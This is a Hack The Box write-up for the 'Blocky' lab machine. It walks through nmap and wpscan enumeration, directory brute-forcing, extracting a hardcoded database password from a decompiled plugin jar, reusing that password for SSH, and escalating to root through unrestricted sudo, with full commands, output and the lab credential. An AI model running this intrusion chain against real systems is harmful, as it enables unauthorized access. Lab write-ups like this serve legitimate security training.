HTB - Blocky
Getting Root:
Found a file under
/pluginswhich contained credentials tophpMyAdminFound a user named
notchfrom the WordPress Scan and was able to ssh to the box using the password found on the file from step 1The user had
ALL ALLon the sudoers file and we were able to get root.
Tools Used:
wpscan, dirsearch.py, jar, javap
Nmap
nmap -sC -sV -p- 10.10.10.37 -oA nmap/Blocky.allports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 00:30 EDT
Nmap scan report for 10.10.10.37
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.88 seconds
Enumeration
WPScan
Found a user named: notch
wpscan --url http://10.10.10.37 -e
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Tue Mar 31 01:42:55 2020
Interesting Finding(s):
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)Dirsearch.py
# dirsearch.py -u http://10.10.10.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E --plain-text-report Blocky_Dirb.txt
200 51KB http://10.10.10.37:80/
301 309B http://10.10.10.37:80/wiki
301 315B http://10.10.10.37:80/wp-content
301 312B http://10.10.10.37:80/plugins
301 316B http://10.10.10.37:80/wp-includes
301 315B http://10.10.10.37:80/javascript
301 313B http://10.10.10.37:80/wp-admin
301 315B http://10.10.10.37:80/phpmyadmin
403 299B http://10.10.10.37:80/server-statusThere were two files under http://10.10.10.37/plugins and decided to have a look.
Downloaded the two files checked for anything interesting:
# The two downlaoded files
BlockyCore.jar
griefprevention-1.11.2-3.1.1.298.jar
# To look at their contents we can use:
jar -tf BlockyCore.jar
# The result is something like:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/MANIFEST.MF
com/myfirstplugin/BlockyCore.class
# We can use the javap to disassemble the class files
javap -c com/myfirstplugin/BlockyCore.class
# That produced the following output
Compiled from "BlockyCore.java"
public class com.myfirstplugin.BlockyCore {
public java.lang.String sqlHost;
public java.lang.String sqlUser;
public java.lang.String sqlPass;
public com.myfirstplugin.BlockyCore();
Code:
0: aload_0
1: invokespecial #12 // Method java/lang/Object."<init>":()V
4: aload_0
5: ldc #14 // String localhost
7: putfield #16 // Field sqlHost:Ljava/lang/String;
10: aload_0
11: ldc #18 // String root
13: putfield #20 // Field sqlUser:Ljava/lang/String;
16: aload_0
17: ldc #22 // String 8YsqfCTnvxAUeduzjNSXe22
19: putfield #24 // Field sqlPass:Ljava/lang/String;
22: return
Credentials:
root:8YsqfCTnvxAUeduzjNSXe22
root:8YsqfCTnvxAUeduzjNSXe22Exploitation
Using those credentials, we can login to phpMyAdmin
However using that password with the user notch (we found it from the WPScan), we can successfully ssh to the box and get the user flag.
ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Tue Mar 31 01:00:33 2020 from 10.10.14.3
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Privilege Escalation
notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
notch@Blocky:~$
notch@Blocky:~$
notch@Blocky:~$ sudo su -
root@Blocky:~#
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~#
root@Blocky:~# Last updated
